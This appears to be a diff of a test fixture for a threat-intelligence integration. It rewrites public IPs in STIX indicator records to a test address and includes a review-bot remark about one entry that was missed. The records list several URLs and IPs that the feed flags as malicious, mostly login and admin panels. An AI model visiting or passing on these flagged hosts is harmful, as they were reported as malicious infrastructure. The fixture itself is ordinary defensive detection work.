 "original": "{\"created\":\"2020-01-26T02:56:23.739Z\",\"description\":\"TS ID: 55256890139; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--5ab7883f-17c2-4cc7-b854-33f8d4bc6b1e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-26T02:56:23.739Z\",\"name\":\"mal_url: http://nortonlilly.info/geli/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/geli/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.739Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6417,7 +6417,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385639314Z",
+ "ingested": "2021-12-13T08:38:40.023286300Z",
 "original": "{\"created\":\"2020-01-26T02:56:23.79Z\",\"description\":\"TS ID: 55256890131; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--3417c349-153d-4002-92dd-1093893f3180\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-26T02:56:23.79Z\",\"name\":\"mal_url: http://2208.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2208.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.79Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6436,7 +6436,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 96.125.163.13",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime",
 "modified": "2020-01-26T02:56:23.857Z",
 "valid_from": "2020-01-26T02:56:23.857Z",
@@ -6458,12 +6458,12 @@
 "first_seen": "2020-01-26T02:56:23.857Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "96.125.163.13"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385645015Z",
- "original": "{\"created\":\"2020-01-26T02:56:23.857Z\",\"description\":\"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-26T02:56:23.857Z\",\"name\":\"mal_ip: 96.125.163.13\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '96.125.163.13']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.857Z\"}",
+ "ingested": "2021-12-13T08:38:40.023293400Z",
+ "original": "{\"created\":\"2020-01-26T02:56:23.857Z\",\"description\":\"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-26T02:56:23.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.857Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -6513,7 +6513,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385649974Z",
+ "ingested": "2021-12-13T08:38:40.023300500Z",
 "original": "{\"created\":\"2020-01-26T02:56:29.981Z\",\"description\":\"TS ID: 55256890129; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--dba2c4a2-6ad5-455c-b14a-b437d32ef6a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:56:29.981Z\",\"name\":\"mal_url: http://1012.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1012.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:29.981Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6565,7 +6565,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385654272Z",
+ "ingested": "2021-12-13T08:38:40.023307600Z",
 "original": "{\"created\":\"2020-01-26T02:56:32.609Z\",\"description\":\"TS ID: 55256890141; iType: mal_url; State: active; Org: H4Y Technologies LLC; Source: CyberCrime\",\"id\":\"indicator--5049f714-5462-4f8d-8b13-d95024d477ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-26T02:56:32.609Z\",\"name\":\"mal_url: http://coupondemo.dynamicinnovation.net/ren/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://coupondemo.dynamicinnovation.net/ren/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:32.609Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6616,7 +6616,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385658731Z",
+ "ingested": "2021-12-13T08:38:40.023311Z",
 "original": "{\"created\":\"2020-01-26T02:56:33.504Z\",\"description\":\"TS ID: 55256890156; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--b476b4e0-387e-4cc6-8b93-437e05c9099c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:56:33.504Z\",\"name\":\"mal_url: http://51.38.140.2/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.38.140.2/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:33.504Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6667,7 +6667,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385663089Z",
+ "ingested": "2021-12-13T08:38:40.023316100Z",
 "original": "{\"created\":\"2020-01-26T02:56:37.688Z\",\"description\":\"TS ID: 55256890163; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--27e994c3-5ee2-4f8b-9fc0-30ca4fc226ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-26T02:56:37.688Z\",\"name\":\"mal_url: http://baxarex228.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://baxarex228.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:37.688Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6686,7 +6686,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 185.222.202.91",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime",
 "modified": "2020-01-26T02:56:40.170Z",
 "valid_from": "2020-01-26T02:56:40.17Z",
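Review bot: The indicator in the `@@ -6616` hunk still carries the literal public address `http://51.38.140.2/login` in its `event.original` context line, while every other literal-IP `mal_url`/`mal_ip` indicator in this range was rewritten to 89.160.20.156, and no hunk touches that entry's preceding `threat.indicator.url` lines, so they presumably still hold the old address as well. If the intent is for fixtures to reference only the supported test address, this entry looks like it was missed; the substitution would need to be made in the input sample (outside this view) and the expected file regenerated so `url.domain`, `url.full` and `event.original` stay consistent with each other. The enclosing JSON object for this hunk starts and ends outside the hunk.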
@@ -6708,12 +6708,12 @@
 "first_seen": "2020-01-26T02:56:40.170Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "185.222.202.91"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385667627Z",
- "original": "{\"created\":\"2020-01-26T02:56:40.17Z\",\"description\":\"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-01-26T02:56:40.17Z\",\"name\":\"mal_ip: 185.222.202.91\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.222.202.91']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:40.17Z\"}",
+ "ingested": "2021-12-13T08:38:40.023319900Z",
+ "original": "{\"created\":\"2020-01-26T02:56:40.17Z\",\"description\":\"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-01-26T02:56:40.17Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:40.17Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -6731,7 +6731,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 49.51.171.215",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime",
 "modified": "2020-01-26T02:56:49.862Z",
 "valid_from": "2020-01-26T02:56:49.862Z",
@@ -6753,12 +6753,12 @@
 "first_seen": "2020-01-26T02:56:49.862Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "49.51.171.215"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385672356Z",
- "original": "{\"created\":\"2020-01-26T02:56:49.862Z\",\"description\":\"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime\",\"id\":\"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:56:49.862Z\",\"name\":\"mal_ip: 49.51.171.215\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '49.51.171.215']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.862Z\"}",
+ "ingested": "2021-12-13T08:38:40.023323600Z",
+ "original": "{\"created\":\"2020-01-26T02:56:49.862Z\",\"description\":\"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime\",\"id\":\"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:56:49.862Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.862Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -6776,7 +6776,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 51.89.138.152",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime",
 "modified": "2020-01-26T02:56:49.900Z",
 "valid_from": "2020-01-26T02:56:49.9Z",
@@ -6798,12 +6798,12 @@
 "first_seen": "2020-01-26T02:56:49.900Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "51.89.138.152"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385676644Z",
- "original": "{\"created\":\"2020-01-26T02:56:49.9Z\",\"description\":\"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-01-26T02:56:49.9Z\",\"name\":\"mal_ip: 51.89.138.152\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '51.89.138.152']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.9Z\"}",
+ "ingested": "2021-12-13T08:38:40.023329200Z",
+ "original": "{\"created\":\"2020-01-26T02:56:49.9Z\",\"description\":\"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-01-26T02:56:49.9Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.9Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -6853,7 +6853,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385681053Z", + "ingested": "2021-12-13T08:38:40.023334600Z", "original": "{\"created\":\"2020-01-26T02:56:49.93Z\",\"description\":\"TS ID: 55256890130; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--8fb33d6a-4ed9-4c5a-9a8e-d7fc7e77b9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-26T02:56:49.93Z\",\"name\":\"mal_url: http://0409.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0409.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.93Z\"}", "category": "threat", "type": "indicator", @@ -6904,7 +6904,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385685050Z", + "ingested": "2021-12-13T08:38:40.023358400Z", "original": "{\"created\":\"2020-01-26T02:57:03.544Z\",\"description\":\"TS ID: 55256890157; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--96012440-e95d-46f0-9b70-3f495f4bab32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:57:03.544Z\",\"name\":\"mal_url: http://jor1.mirtakala.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.mirtakala.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:03.544Z\"}", "category": "threat", "type": "indicator", 
@@ -6923,7 +6923,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://92.63.197.185/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-01-26T02:57:10.525Z", "valid_from": "2020-01-26T02:57:10.525Z", 
@@ -6947,16 +6947,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://92.63.197.185/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "92.63.197.185", - "full": "http://92.63.197.185/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385689148Z", - "original": "{\"created\":\"2020-01-26T02:57:10.525Z\",\"description\":\"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:10.525Z\",\"name\":\"mal_url: http://92.63.197.185/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.197.185/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.525Z\"}", + "ingested": "2021-12-13T08:38:40.023362100Z", + "original": "{\"created\":\"2020-01-26T02:57:10.525Z\",\"description\":\"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:10.525Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.525Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7007,7 +7007,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385693346Z", + "ingested": "2021-12-13T08:38:40.023365700Z", "original": "{\"created\":\"2020-01-26T02:57:10.571Z\",\"description\":\"TS ID: 55256890135; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--275f3354-1d9c-4167-9f1a-abb06bb0f138\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-26T02:57:10.571Z\",\"name\":\"mal_url: http://pnumbrero3.ru/soft/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pnumbrero3.ru/soft/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.571Z\"}", "category": "threat", "type": "indicator", @@ -7058,7 +7058,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385697734Z", + "ingested": "2021-12-13T08:38:40.023369700Z", "original": "{\"created\":\"2020-01-26T02:57:14.057Z\",\"description\":\"TS ID: 55256890127; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--b449e457-5327-40a2-8bda-0167c219490c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:14.057Z\",\"name\":\"mal_url: http://10122.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10122.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:14.057Z\"}", "category": "threat", "type": "indicator", 
@@ -7109,7 +7109,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385702082Z", + "ingested": "2021-12-13T08:38:40.023374700Z", "original": "{\"created\":\"2020-01-26T02:57:26.003Z\",\"description\":\"TS ID: 55256890125; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--c8559f01-42c4-42f1-8464-e2e2e2af84d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:26.003Z\",\"name\":\"mal_url: http://10123.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10123.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:26.003Z\"}", "category": "threat", "type": "indicator", @@ -7161,7 +7161,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385713864Z", + "ingested": "2021-12-13T08:38:40.023380100Z", "original": "{\"created\":\"2020-01-26T02:57:30.579Z\",\"description\":\"TS ID: 55256890134; iType: mal_url; State: active; Org: Reg.Ru Hosting; Source: CyberCrime\",\"id\":\"indicator--5898c646-c44b-4365-9d82-77bb1705b6de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:30.579Z\",\"name\":\"mal_url: http://u0929560.cp.regruhosting.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u0929560.cp.regruhosting.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:30.579Z\"}", "category": "threat", "type": "indicator", 
@@ -7212,7 +7212,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385729323Z", + "ingested": "2021-12-13T08:38:40.023386200Z", "original": "{\"created\":\"2020-01-27T02:54:45.711Z\",\"description\":\"TS ID: 55259870663; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--f5e450ee-d6c5-4a92-bfb4-4f8025b8c7e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:45.711Z\",\"name\":\"mal_url: http://turames3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:45.711Z\"}", "category": "threat", "type": "indicator", @@ -7263,7 +7263,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385736567Z", + "ingested": "2021-12-13T08:38:40.023389900Z", "original": "{\"created\":\"2020-01-27T02:54:59.928Z\",\"description\":\"TS ID: 55259870666; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--05b6bf66-2f31-4640-9ecd-9f8a3408d594\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:59.928Z\",\"name\":\"mal_url: http://turames.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:59.928Z\"}", "category": "threat", "type": "indicator", 
@@ -7314,7 +7314,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385742338Z", + "ingested": "2021-12-13T08:38:40.023395700Z", "original": "{\"created\":\"2020-01-27T02:55:12.572Z\",\"description\":\"TS ID: 55259870784; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff7fb9bd-e816-4a76-ae5c-72c22980c722\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:12.572Z\",\"name\":\"mal_url: http://bumaga5.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga5.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:12.572Z\"}", "category": "threat", "type": "indicator", @@ -7365,7 +7365,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385747487Z", + "ingested": "2021-12-13T08:38:40.023399700Z", "original": "{\"created\":\"2020-01-27T02:55:14.232Z\",\"description\":\"TS ID: 55259870699; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b0a1e3ec-d523-4e98-90d6-8ad3daa321d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.232Z\",\"name\":\"mal_url: http://mogute.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogute.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.232Z\"}", "category": "threat", "type": "indicator", 
@@ -7416,7 +7416,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385752336Z", + "ingested": "2021-12-13T08:38:40.023403900Z", "original": "{\"created\":\"2020-01-27T02:55:14.255Z\",\"description\":\"TS ID: 55259870694; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--92f0ba43-ec1f-4a37-b933-33ddd3da7e2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.255Z\",\"name\":\"mal_url: http://moguto.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguto.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.255Z\"}", "category": "threat", "type": "indicator", @@ -7467,7 +7467,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385757025Z", + "ingested": "2021-12-13T08:38:40.023407900Z", "original": "{\"created\":\"2020-01-27T02:55:30.174Z\",\"description\":\"TS ID: 55259870793; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ea0af135-c3c0-4e4e-96d9-bdf1ebb9699e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:30.174Z\",\"name\":\"mal_url: http://bumaga1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.174Z\"}", "category": "threat", "type": "indicator", 
@@ -7518,7 +7518,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385761614Z", + "ingested": "2021-12-13T08:38:40.023411900Z", "original": "{\"created\":\"2020-01-27T02:55:30.287Z\",\"description\":\"TS ID: 55259870765; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0de60f9b-7383-4c60-9caf-c578c3682487\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-27T02:55:30.287Z\",\"name\":\"mal_url: http://dufre1in.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1in.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.287Z\"}", "category": "threat", "type": "indicator", @@ -7569,7 +7569,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385765952Z", + "ingested": "2021-12-13T08:38:40.023417Z", "original": "{\"created\":\"2020-01-27T02:55:30.319Z\",\"description\":\"TS ID: 55259870697; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e8d57d94-82ce-4ce3-a983-d6928172d795\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:30.319Z\",\"name\":\"mal_url: http://moguti.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguti.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.319Z\"}", "category": "threat", "type": "indicator", 
